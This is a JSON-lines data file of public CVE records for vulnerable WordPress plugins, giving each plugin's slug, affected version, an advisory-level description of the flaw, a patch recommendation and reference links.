{"CVE_ID":"CVE-2024-5810","slug":"wp2speed","versionImpact":"1.0.1","description":"The WP2Speed Faster \u2013 Optimize PageSpeed Insights Score 90-100 plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.0.1. This is due to the use of hardcoded credentials to authenticate all the incoming API requests. This makes it possible for unauthenticated attackers to overwrite CSS, update the trial settings, purge the cache, and find attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe97ac1-cab9-4b6f-bddd-bdcdc9faee40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe97ac1-cab9-4b6f-bddd-bdcdc9faee40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp2speed\\\/trunk\\\/lib\\\/includes\\\/optimize.php#L165\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3679","slug":"premium-seo-pack","versionImpact":"1.6.001","description":"The Premium SEO Pack \u2013 WP SEO Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.001. This makes it possible for unauthenticated attackers to view limited information from password protected posts through the social meta data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-seo-pack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-seo-pack\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37226","slug":"kanban","versionImpact":"2.5.21","description":"Missing Authorization vulnerability in Kanban for WordPress Kanban Boards for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Kanban Boards for WordPress: from n\/a through 2.5.21.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11409","slug":"grid-view-gallery","versionImpact":"1.0","description":"The Grid View Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0 via deserialization of untrusted input from cs_all_photos_details parameter. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-view-gallery\\\/trunk\\\/custom-slider-short-code.php#L161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-view-gallery\\\/trunk\\\/custom-slider-short-code.php#L161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a407d8b1-1d21-4b23-a8d6-a977544a19b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a407d8b1-1d21-4b23-a8d6-a977544a19b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11336","slug":"clickbank-storefront","versionImpact":"1.7","description":"The Clickbank WordPress Plugin (Storefront) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7. This is due to missing or incorrect nonce validation via the cs_menu page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickbank-storefront\\\/trunk\\\/admin.inc.php#L700\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clickbank-storefront\\\/trunk\\\/admin.inc.php#L700\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11606","slug":"tabs-shortcode","versionImpact":"2.0.2","description":"The Tabs Shortcode WordPress plugin through 2.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76ae8f5b-2d0e-4bf5-9ae3-f76cd52dea8d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76ae8f5b-2d0e-4bf5-9ae3-f76cd52dea8d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13458","slug":"notice-faq","versionImpact":"2.2.1","description":"The WordPress SEO Friendly Accordion FAQ with AI assisted content generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'noticefaq' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-faq\\\/trunk\\\/noticefaq.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-faq\\\/trunk\\\/noticefaq.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/713f5bf5-f282-436e-8e8c-18543458bea1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/713f5bf5-f282-436e-8e8c-18543458bea1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1648","slug":"yawave","versionImpact":"2.9.1","description":"The Yawave plugin for WordPress is vulnerable to SQL Injection via the 'lbid' parameter in all versions up to, and including, 2.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/atviksecurity.com\\\/yawave-wordpress-plugin-unauthenticated-sql-injection\\\/\",\"name\":\"https:\\\/\\\/atviksecurity.com\\\/yawave-wordpress-plugin-unauthenticated-sql-injection\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yawave\\\/trunk\\\/includes\\\/shortcode.liveblog.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yawave\\\/trunk\\\/includes\\\/shortcode.liveblog.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5cc21a-eb3a-429a-a0f9-0181d95a9eeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5cc21a-eb3a-429a-a0f9-0181d95a9eeb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2513","slug":"smartifw","versionImpact":"1.0.4","description":"The Smart Icons For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/includes\\\/media.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/includes\\\/media.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/smart_icons_for_wordpress.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartifw\\\/tags\\\/1.0.4\\\/smart_icons_for_wordpress.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartifw\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smartifw\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f5d8eac-fca9-4222-9a5f-a12748d298ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f5d8eac-fca9-4222-9a5f-a12748d298ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3521","slug":"wps-team","versionImpact":"3.4.0","description":"The Team Members \u2013 Best WordPress Team Plugin with Team Slider, Team Showcase & Team Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Social Link icons in all versions up to, and including, 3.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wps-team\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wps-team\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93b83e65-09d6-4ad5-85f3-d18a9a35f39d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93b83e65-09d6-4ad5-85f3-d18a9a35f39d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5938","slug":"digital-marketing-agency-templates-for-elementor","versionImpact":"1.1.1","description":"The Digital Marketing and Agency Templates Addons for Elementor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the import_templates() function. This makes it possible for unauthenticated attackers to trigger an import via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-marketing-agency-templates-for-elementor\\\/trunk\\\/includes\\\/importer.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-marketing-agency-templates-for-elementor\\\/trunk\\\/includes\\\/importer.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3447438-1624-451a-a50c-981021399198?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3447438-1624-451a-a50c-981021399198?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8905","slug":"err-our-team","versionImpact":"1.0","description":"The Inpersttion For Theme plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0 via the theme_section_shortcode() function. This is due to the plugin not restricting what functions can be called. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server which is limited to arbitrary functions without any user supplied parameters.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/err-our-team\\\/trunk\\\/inc\\\/inpersttion-for-shortcode.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/err-our-team\\\/trunk\\\/inc\\\/inpersttion-for-shortcode.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4dc8ab-792b-41ff-a7b9-77a11c02d91b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4dc8ab-792b-41ff-a7b9-77a11c02d91b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1026","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the listPostsCategory function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to get post listings by category as long as those posts are published. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978d5715-7993-4f89-8d69-895467633bfb\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978d5715-7993-4f89-8d69-895467633bfb\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36724","slug":"wordable","versionImpact":"3.1.1","description":"The Wordable plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.1.1. This is due to the use of a user supplied hashing algorithm passed to the hash_hmac() function and the use of a loose comparison on the hash which allows an attacker to trick the function into thinking it has a valid hash. This makes it possible for unauthenticated attackers to gain administrator privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2234193\\\/wordable\\\/trunk\\\/wordable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2234193\\\/wordable\\\/trunk\\\/wordable.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1ab218-37bd-407a-8cb9-66f761849c21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1ab218-37bd-407a-8cb9-66f761849c21?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-plugins-and-themes-vulnerabilities-roundup\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-plugins-and-themes-vulnerabilities-roundup\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2229","slug":"rduplicator","versionImpact":"2.0","description":"The Quick Post Duplicator for WordPress is vulnerable to SQL Injection via the \u2018post_id\u2019 parameter in versions up to, and including, 2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with contributor-level privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34e31a0f-27de-4536-9a7e-b8f68e557b3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34e31a0f-27de-4536-9a7e-b8f68e557b3f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rduplicator\\\/trunk\\\/quick-post-duplicator.php?rev=2844890\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rduplicator\\\/trunk\\\/quick-post-duplicator.php?rev=2844890\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5205","slug":"add-custom-body-class","versionImpact":"1.4.1","description":"The Add Custom Body Class plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'add_custom_body_class' value in versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9841b57b-b869-4282-8781-60538f6f269f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9841b57b-b869-4282-8781-60538f6f269f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-custom-body-class\\\/trunk\\\/add-custom-body-class.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-custom-body-class\\\/trunk\\\/add-custom-body-class.php#L32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37890","slug":"kb-support","versionImpact":"1.5.88","description":"Missing Authorization vulnerability in WPOmnia KB Support \u2013 WordPress Help Desk and Knowledge Base allows Accessing Functionality Not Properly Constrained by ACLs.\u00a0Users with a role as low as a subscriber can view other customers.This issue affects KB Support \u2013 WordPress Help Desk and Knowledge Base: from n\/a through 1.5.88.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kb-support\\\/wordpress-kb-support-wordpress-help-desk-plugin-1-5-88-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kb-support\\\/wordpress-kb-support-wordpress-help-desk-plugin-1-5-88-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24712","slug":"heateor-social-login","versionImpact":"1.1.30","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Team Heateor Heateor Social Login WordPress allows Stored XSS.This issue affects Heateor Social Login WordPress: from n\/a through 1.1.30.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-login\\\/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-login\\\/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2089","slug":"remote-content-shortcode","versionImpact":"1.5","description":"The Remote Content Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'remote_content' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66abfe6b-c706-4e70-b35b-ee04da613933?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66abfe6b-c706-4e70-b35b-ee04da613933?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4270","slug":"svgmagic","versionImpact":"1.1","description":"The SVGMagic WordPress plugin through 1.1 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a3b89cc-7a81-448a-94fc-36a7033609d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a3b89cc-7a81-448a-94fc-36a7033609d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5704","slug":"faq-for-woocommerce","versionImpact":"1.6.4","description":"The XPlainer \u2013 WooCommerce Product FAQ [WooCommerce Accordion FAQ Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add new and update existing FAQs, FAQ lists, and modify FAQ associations with products.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d3e476d-0885-4e8c-a682-bd64d9f13b53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d3e476d-0885-4e8c-a682-bd64d9f13b53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L326\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/faq-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/faq-woocommerce-admin-functions.php#L385\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2541","slug":"popup-builder","versionImpact":"4.3.3","description":"The Popup Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the Subscribers Import feature. This makes it possible for unauthenticated attackers to extract sensitive data after an administrator has imported subscribers via a CSV file. This data may include the first name, last name, e-mail address, and potentially other personally identifiable information of subscribers.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/086cd6a0-adb6-4e12-b34c-630297f036f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/086cd6a0-adb6-4e12-b34c-630297f036f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/trunk\\\/com\\\/libs\\\/Importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/trunk\\\/com\\\/libs\\\/Importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
